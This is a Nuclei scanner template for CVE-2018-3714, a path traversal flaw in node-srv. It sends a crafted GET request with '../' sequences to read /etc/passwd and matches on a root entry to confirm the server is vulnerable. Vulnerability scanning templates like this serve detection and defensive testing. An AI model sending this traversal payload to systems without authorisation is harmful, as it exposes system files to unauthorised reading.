nuclei-templates/cves/CVE-2018-3714.yaml

20 lines
368 B
YAML

id: cve-2018-3714
info:
name: node-srv Path Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body